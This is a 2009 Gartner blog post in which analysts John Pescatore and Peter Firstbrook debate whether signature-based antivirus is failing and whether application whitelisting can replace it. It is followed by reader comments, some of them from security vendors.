John PescatoreGartner’s lead analyst on endpoint protection, Peter Firstbrook, offered up a guest post on how major advances in desktop protection are badly needed. Peter and I had a bit of an email dialog, so we decided to include that dialog in the post:
Peter F: A recently published report from Trusteer (Measuring the in-the-wild effectiveness of Antivirus against Zeus) showed that 55% of 10,000 machines infected with the trojan Zeus had antivirus that was up-to-date. This is just another in a long line of reports that illustrate the increasing impotence of signature-based antivirus software, with the recent Cyveillance intelligence report and Anti-virus comparative proactive/ retrospective test being two others. Meanwhile even very security conscientious Gartner clients are increasingly reporting serious malware incidents.
It is clear that signature based protection mechanisms, which depend on the knowledge of threat before they can protect the host, are dead. What other defensive security system allows virtually anything to happen unless they actually know it is bad? Imagine a person picking mushrooms and eating anything they don’t know for certain is bad. They wouldn’t live very long to say the least. Despite the evidence of antivirus ineffectiveness very few alternatives are on the horizon. One solution we think has value is the Whitelist approach (see “Application Control Market Update”) . It would be significantly better for most organizations to lock endpoints from running anything that isn’t a known good application. Symantec’s recent Quorom announcement and McAfee’s acquisition of SolidCore are both about improving their ability to do this. Meanwhile vendors such as Bit9, Lumension, SignaCert and CoreTrace are busy attempting to lower the administrative overhead of whitelisting.
While it is still early days for this second generation of whitelisting solutions it is clear that the blacklist is dying a death of a thousand (million?) cuts and something better step into the breach soon. IT security buyers should give these upstarts some attention and put pressure on their incumbent blacklist provider to step up their efforts to solve this problem and stop attacking the symptoms.
John P: This seems aimed at AV-only at the desktop. Gartner has said that desktop protection is really “Endpoint Protection Platforms” these days, where the vendors have gone beyond just signature-based anti-viral and anti-spyware, and added host-based intrusion prevention and some levels of application control policies. Are you saying that those are signature-based AV only?
Also, I think the whitelisting part doesn’t address the fact that whitelisting is just as reactive as blacklisting. I can easily argue in the Javascript/ActiveX/AJAX/iPhone world good apps growing just as fast, and likely faster, than malware. Whitelisting is just a form of lockdown – consumerization is driving enterprises to have less control over the applications users run, not more. The “greylist” problem area is where the breakthroughs will have to happen.
Peter F: To the first point yes EPPs are better but customers are not deploying the HIPS components because they are too noisy. The Zeus study could not say which AV products were installed but most of the consumer solutions all boast about their non-signature based protection mechanisms.
True, whitelists are somewhat reactive. They have to wait for an app to be published before they can identify it in some cases. That is mitigated by cooperation between software developers and the whitelist caretakers, as opposed to the cat and mouse of the AV vendors and the attackers. But the real big difference between whitelisting and blacklisting is that the penalty for failure of a whitelist system is that you have to wait for a new application to get certified before it can run. That is less damaging than the penalty for failure of a blacklist which results in an infection and potentially a damaging security breach.
I agree that the Java/ActiveX apps in a browser are difficult to whitelist but that can be managed with a sandbox or policy restrictions on what these types of apps can do. Moreover Java/ActiveX are most often used to launch a more permanent presence on the client (i.e. the bot or keystroke logger), so the second stage would be stopped with a whitelist policy.
IPhone is actually an example of a “whitelist” system. Apple has to approve every app before it can be run. Although it is more restrictive for consumers and an extra step for application developers, it is good for consumers that these applications are pre-vetted for stability and security. The “malware pretending to be Antivirus” scheme that is currently one of the more prolific threats on PCs and Macs would never work in a iPhone or a PC that is whitelisted. At the same time these applications easily evade behavioral based HIPS because their behavior is exactly the same as other “good” applications.
So the bottom line is that EPP is better than vanilla AV but it still is not doing the job. We need something else and even with kinks whitelisting is the best hope we have right now. If not what else might fill the gap?
John P:
Whitelists not only have to wait for the app to be published, they have to wait for IT to “bless” the app – again, consumerization is all about not waiting for IT. I agree that the “uber-whitelists” where all kinds of apps are quickly blessed as at least being “safe” provides much more flexibility than the old lockdown approach, but there will always be apps that users just have to use that aren’t on the white list or black list – application control capabilities are key there.
From a security perspective, the iPhone App Store isn’t really a whitelist. Apple certainly hasn’t shown publicly that any meaningful amount of actual security testing goes on as part of app certification. I think they are depending on the “the iPhone can only run one app at a time” excuse for why typical malware wouldn’t work, but it does leave it open to phishing style apps in a big way. But I do agree – if users are happy living within the limitations of the App Store on the iPhone, there is a big opportunity to using this model on desktops to great security gain.
Category: Uncategorized Tags:
9 responses so far ↓
1 Vikram Phatak October 1, 2009 at 5:10 pm
In 2008, NSS Labs tested the effectiveness of Solidcore vs. viruses and found it to be very effective.
To clarify: the whitelist approach requires a “gold image” (OS + Applications) to start with, and registration of all subsequent applications & upgrades via user consent. Sounds good, right? But what if the user consents to install malware?
The Achilles heal of application whitelisting is not technical, but rather the end user. The fundamental problem with application whitelisting is that a large percentage of malware is of the socially engineered variety. Meaning that users would likely “register” the virus as an acceptable program that they are trying to install.
Thus, NSS Labs believes whitelisting is an excellent solution for relatively static systems where acceptable applications are kept to a minimum, such as embedded devices like ATMs, and datacenter servers. But it is of limited use as a broader technology solution.
2 Tweets that mention Guest Blogger Peter Firstbrook: Where Is The Breakthrough on Desktop Security? -- Topsy.com October 1, 2009 at 8:35 pm
[...] This post was mentioned on Twitter by Cindy Kim and _Lumension. _Lumension said: Great article by Peter Firstbrook (@Pfirstbrook): Where is the breakthrough on desktop security http://bit.ly/80gj2. [...]
3 Ilya Rabinovich October 2, 2009 at 10:09 am
Hi John!
In fact, I strongly disagree. Especially with Peter F. Back on topic:
“A recently published report from Trusteer”- sorry, but I was developing reverse sandbox solution and I can say loud and clear that that solutions just gives false feel of security and nothing more.
“To the first point yes EPPs are better but customers are not deploying the HIPS components because they are too noisy”- really? Did you ever try sandbox HIPS?
“IPhone is actually an example of a “whitelist” system”- that’s why many are using jailbreak to install software not approved by the Apple.
“if users are happy living within the limitations of the App Store on the iPhone”- there is open-source and “truly” free software with this platform. Only “99c” ones. That’s the platform’s limitation. Is it suitable for PC? Yes, by the price of innovations and enthusiast developers.
Also, you’ve forgot to mention about interpreted types files like “.cmd”, “.ps1″ or “.vbs” because it’s practically impossible to be whitelisted.
In the reality, whitelisting is very useful,but not as a standalone technique, but as a supporting one. And this technology has very strong limitations- for example, many software, infected by InDuc virus have been listed as “known as good” within whitelisting databases. Whitelisting is suitable not only with blacklisting-style protections, but with sandboxing-style HIPS (“graylist” problem solution) too.
4 Scott Olson October 2, 2009 at 10:34 am
As a user of a Mac with relatively little viable security options, I have to say that if I simply had a whitelisting solution that prevented unauthorized software from being loaded through an exploit I would be happy.
Vikram may be right when he points out that users may authorize installation of malware, but I would say that would be much less concerning to me than malware getting on my machine because I clicked on a shortened URL on a tweet. The most concerning exploitations today do not require user authorization to install the malicious code, they just require you to visit a site that exploits a browser vulnerability.
The problem of user authorized installation of malware can be lessened through a change control process that takes into account the distributer of the application, whether the application was signed or not, etc. This is a far better problem than we have now which is essentially NO protection whatsoever from blacklist anti-virus.
Looking at my Mac as a clean slate, I think it’s a good example of what should be done if we started over with desktop security. If I had a viable whitelist solution that was intelligent about handling application change, I wouldn’t bother with anti-virus.
5 Stiennon October 3, 2009 at 7:21 pm
Peter should not say “Signature based AV is Dead” unless it is OK to stop using it. I would not advise that.
I think Scott Olsen above is on to the solution. Switch OS’s. Start over. Build security into a version of Linux or BSD and start moving to applications that are supported on it. An expensive form of white listing but…
6 Rob Lewis October 3, 2009 at 8:30 pm
Richard,
For one that touts bolstering cyber defense, you seem reluctant to embrace technology that fortifies nodes on the grid so that they are no longer puncture points. What part of any OS, any application, do you not get?
You pick a version of Linux or BSD and you can use any applications you want. The beauty of Trustifier is that it can be used with what you are using right now; no need to “start over” and there may not be time to “start over”, if one listens to all those cyberwarfare spouting security pundits.
7 John Pescatore October 5, 2009 at 6:33 am
Had to do a bit of comment deletion, as don’t want to get too product specific on this blog.
8 Greg Valentine October 5, 2009 at 1:50 pm
First of all, fair notice (Red alert!). I work for CoreTrace; one of the vendors that is mentioned in the article.
I for one enjoyed this posting a great deal. The main reason is that I believe that both Peter and John are both on the right trail. It seems that everyone is in agreement with Peter in saying that traditional blacklisting technology is on its last legs. The real question is what will become the new foundation for endpoint security? Completely agree with Peter here.
I also agree with John when he says that application whitelisting can be as reactive as blacklisting if the mega-whitelist approach is taken. It is arguably as large of a problem (if not a larger problem) to keep track of all the ‘good’ binaries out there in the world vs all of the malware out there.
CoreTrace looks at the problem from a different angle. BOUNCER (the CoreTrace application) creates and maintains a whitelist for each individual endpoint and protects each computer against its own unique ‘baseline’ whitelist. This unique way of looking at the problem not only protects all computers from new malware trying to run (just like any other whitelisting product) but it also provides for some nice configuration control capabilities. There are any number of legitimate applications in the world which are most definitely not malware however the organization may not consider those applications authorized to be able to run on their systems. With BOUNCER installed, unauthorized applications would also be prevented just as easily as new malware.
I agree with John again when he mentioned the fact that whitelisting can actually add more work for IT. To have to wait to receive a blessing from the IT group before adding new applications or updates to the whitelist would be a significant problem for any organization. This would inevitably lead to a huge frustration point for both the IT department as well as the various end users.
To resolve this ‘challenge’, CoreTrace added the ability to define various ‘sources of trust’. Basically this means that if a new application or change is originating from one of these sources of trust then it would be allowed to occur AND the new binaries from the installation package will automatically be added to the whitelist. Network shares, applications, users, digital signatures and system updaters are all various forms of trusted change. The philosophy of BOUNCER is to cooperate with an organizations normal business process regarding change. For example, if a company uses a system management application (such as SCCM) to push out new applications, then BOUNCER can be configured to allow that to take place. The IT group does not need to do anything different to push out a new update or application to their infrastructure. The same example can be applied to a new ActiveX component (BOUNCER uses the digital signature of the ActiveX component to determine if it should be allowed to execute or not).
In the end, it is truly exciting to see these types of discussions taking place in an open forum. Please keep up the good work!
9 Application whitelisting and the importance of trusted change — CoreTrace WhiteSpace October 21, 2009 at 3:04 pm
[...] For the purpose of this post, I will make the assumption that most IT professionals are dissatisfied with their current endpoint security, are looking for alternatives, and that application whitelisting is on the short list of possibilities. This is certainly the case at Gartner Group if you look at their recent postings like this one. [...]
Leave a Comment